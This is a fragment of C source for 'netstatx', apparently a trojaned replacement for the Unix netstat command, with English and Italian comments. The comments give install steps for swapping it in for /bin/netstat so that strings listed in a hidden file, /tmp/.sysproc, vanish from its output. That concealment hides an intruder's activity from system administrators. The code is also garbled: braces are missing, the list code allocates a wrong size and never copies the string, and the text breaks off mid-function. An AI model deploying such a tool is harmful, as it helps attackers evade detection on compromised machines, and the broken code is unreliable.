1) #define LISTOFITEMS "/tmp/.sysproc"
* Put here the strings yout to be hidden, you must create it by your self!
* 2) #define TMPOUTFILE "/tmp/.tmp"
* If you wish u can change the TMPOUTFILE but it's not needed.
* Compile the file
* Move the real /bin/netstat in /usr/bin/netstat
* Put netstatx in /bin
* For example :
* #gcc netstatx.c -o netstatx
* #mv /bin/netstat /usr/bin/netstat
* #mv netstatx /bin/netstat
* PS: Italian--->
* L'autore si manleva da ogni responsabilit?circa l'uso che terzi possono fare
* del programma in questione. Il programma nasce come esempio di strumento atto
* a nascondere delle stringhe dallo Standard Output.
* CONSIGLIO: Non hackate, ?stupido :>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#define LISTOFITEMS "/tmp/.sysproc" //this is the file where u have to put the strings u wish to be hidden
#define TMPOUTFILE "/tmp/.tmp" //U can modify here, if u want
#define new(p) ( p * )malloc(sizeof ( p ))
unsigned char filter (char *big , char *lil ) ;
// Hiding
struct ItemList
char *item ;
struct ItemList *next ;
} ;
// Aggiunge una stringa di path alla lista
// Ritorna 0 se c'e' errore
// 1 altrimenti
unsigned char AddItemToHide (struct ItemList **p, char *str)
struct ItemList *ptr ;
unsigned int len ;
if (!str)
return 0 ;
ptr = new ( struct ItemList ) ;
ptr->next = *p ;
len = strlen(str) ;
ptr->item = (char *) malloc (len-1) ;
*p = ptr ;
return 1 ;
// Distruttore della lista
void Destroy (struct ItemList **p)
if (!(*p))
return ;
if ((*p)->next)
free((*p)->item) ;
Destroy(&((*p)->next)) ;
free (*p) ;
// Trova un item nella lista * non serve x ora
unsigned int FindItem ( struct ItemList *p , char *item )